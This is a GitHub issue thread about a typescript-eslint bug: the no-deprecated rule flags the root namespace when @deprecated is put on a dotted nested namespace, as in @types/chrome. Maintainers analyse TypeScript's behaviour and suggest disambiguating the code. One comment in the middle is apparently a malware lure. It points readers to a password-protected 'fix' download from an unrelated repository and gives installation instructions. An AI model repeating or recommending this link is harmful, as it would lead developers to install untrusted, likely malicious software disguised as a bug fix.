### ISSUE TITLE
Bug: [no-deprecated] Erroneous lint errors when @deprecated is applied to a nested namespace declaration

### ISSUE THREAD

**Issue by ashvinsrivatsa** [typescript-eslint/typescript-eslint#9902]
### Before You File a Bug Report Please Confirm You Have Done The Following...

- [X] I have tried restarting my IDE and the issue persists.
- [X] I have updated to the latest version of the packages.
- [X] I have [searched for related issues](https://github.com/typescript-eslint/typescript-eslint/issues?q=is%3Aissue+label%3A%22package%3A+eslint-plugin%22) and found none that matched my issue.
- [X] I have [read the FAQ](https://typescript-eslint.io/linting/troubleshooting) and my problem is not listed.

### Playground Link

https://typescript-eslint.io/play/#ts=5.5.4&fileType=.tsx&code=CYUwxgNghgTiAEA7KBbEBnADlMCCCAdAELwDeAsAFDzxgD2i6ALvAJ4Bc8zMAlogOYBuKgF8qVAPQAqKfAACoTHDBQmIYPCkSqoSLATI0WHPgIBhMlRr1GLAF6dufIaPGUb6OhBAEIdfgAUhEQErACUgkA&eslintrc=N4KABGBEBOCuA2BTAzpAXGUEKQAIBcBPABxQGNoBLY-AWhXkoDt8B6Jge1oBNFjpEZAIb5E3dFETRoHaJHBgAviEVA&tsconfig=N4KABGBEDGD2C2AHAlgGwKYCcDyiAuysAdgM6QBcYoEEkJemy0eAcgK6qoDCAFutAGsylBm3TgwAXxCSgA&tokens=false

### Repro Code

```TypeScript
declare namespace A.B {
  const y: string;
}

/** @deprecated */
declare namespace A.C {
  const z: string;
}

console.log(A.B.y);
```

### ESLint Config

```javascript
module.exports = {
  "rules": {
    "@typescript-eslint/no-deprecated": "error"
  }
}
```

### tsconfig

```jsonc
{
  "compilerOptions": {
    "strictNullChecks": true
  }
}
```

### Expected Result

No lint errors on the line `console.log(A.B.y)`, because none of the elements `A`, `A.B`, or `A.B.y` are marked `@deprecated`.

### Actual Result

A `@typescript-eslint/no-deprecated` lint error appears on that line:

```
`A` is deprecated. 10:13 - 10:14
```

### Additional Info

A real-world example of this is in the `@types/chrome` package, which provides typing for browser-specific APIs exposed by Chrome for use in Chrome Apps and Chrome Extensions. There are a bunch of specific APIs that are deprecated, such as:

```typescript
/**
 * @deprecated Part of the deprecated Chrome Apps platform
 */
declare namespace chrome.socket {
  // ...
}
```

But this results in the linter raising a `@typescript-eslint/no-deprecated` at every usage site of `chrome` (not just `chrome.socket` - also other things like `chrome.tabs`, `chrome.runtime`, etc, which aren't deprecated).

**Comment by Josh-Cena** [comment]
Look at the editor hint:

<img width="396" alt="A is deprecated." src="https://github.com/user-attachments/assets/9a03f782-225a-411b-9062-e0ac56c9ed15">

So in fact, this JSDoc does indicate that `A` is deprecated. Changing it would require changing TS, not us.

**Comment by ashvinsrivatsa** [comment]
Does it? See this code [in the TypeScript playground](https://www.typescriptlang.org/play/?#code/HYQwtgpgzgDiDGEAEBBAdAISQbwFBKQHoAqYpAAQBMIYAnCeEAFwkqWMPyQgA8YB7WkyTx+wKMJ5IAvEgBEPOQG4uvAUJFiJSAJ4z5OubgC+uXCTJUa9RizYdcoSLATJ0AYRyq+g4aPHCAF76coHKJmb+UPwANhBoMfwA5gAU6BhoPACUKlGx8Ymp6Wg6OUA):

```typescript
namespace A.B {
  /** @deprecated */
  export const x = "x";
  export const y = "y"
}

/** @deprecated */
namespace A.C {
  export const z = "z";
}

console.log(A.B.x);
console.log(A.B.y);
```

On the two `console.log` lines, the IDE applies the deprecation strikethrough only to the term `x`, not to either instance of the term `A`.

**Comment by Josh-Cena** [comment]
The strikethrough seems to be applied inconsistently. Consider:

```ts
/** @deprecated */
namespace Foo.Bar {
  export const x = 1;
}

namespace Foo.Baz {
  export const x = 1;
}

Foo.Bar.x;
```

<img width="186" alt="Foo striked through" src="https://github.com/user-attachments/assets/56a8e6f2-2dea-4b31-bf9c-b421c7abcd35">

OTOH, if you reorder `Foo.Bar` and `Foo.Baz`, you don't get any strikethroughs, on either `Foo` or `Foo.Baz`. Nevertheless, the quickinfo tells you that `Foo` indeed gets the `@deprecated` annotation, so it's considered deprecated when we query TS type info.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bradzacher** [comment]
Yeah I'd agree here.

Your code is really ambiguous.
```ts
/** @deprecated */
namespace Foo.Bar {}
```

What's meant to be deprecated here?
Is it `Foo` or `Foo.Bar` or both?
Is there another declaration of `Foo` that isn't deprecated? Is it supposed to be or is it not?

Add to that what Josh has found -- TS is even unsure what you meant!

So the recommendation is that you need to disambiguate your code.
EG by explicitly nesting the namespace and attaching the deprecation comment appropriately
```ts
namespace Foo {
  /** @deprecated */
  export namespace Bar {}
}
```

Or in the context of your example:

```ts
declare namespace A.B {
  const y: string;
}

declare namespace A {
  /** @deprecated */
  namespace C {
    const z: string;
  }
}

console.log(A.B.y); // no error
console.log(A.C.z); // errors
```
[playground](https://typescript-eslint.io/play/#ts=5.5.4&showAST=types&fileType=.tsx&code=CYUwxgNghgTiAEA7KBbEBnADlMCCCAdAELwDeAsAFDzxgD2i6ALvAJ4Bc8zMAlogOYBuKgF8qVUJFgJkaLDnxkqNAPQAqNfAACoTHDBQmIYPDUrlSVBmy54AYSXUatBs3gAvTtz5CLYyv5U9Ix0ECAEEHT8ABSERASsAJTClMHooeGRMYR2BO7JVEA&eslintrc=N4KABGBEBOCuA2BTAzpAXGUEKQAIBcBPABxQGNoBLY-AWhXkoDt8B6Jge1oBNFjpEZAIb5E3dFETRoHaJHBgAviEVA&tsconfig=N4KABGBEDGD2C2AHAlgGwKYCcDyiAuysAdgM6QBcYoEEkJemy0eAcgK6qoDCAFutAGsylBm3TgwAXxCSgA&tokens=false)

**Comment by Josh-Cena** [comment]
In this case it's from `@types/chrome`, so I'd appreciate how hard it would be to fix...

**Comment by bradzacher** [comment]
Filed https://github.com/microsoft/TypeScript/issues/59792 -- we'll see what they say.
Clarification on the "correct" disambiguation would be good.
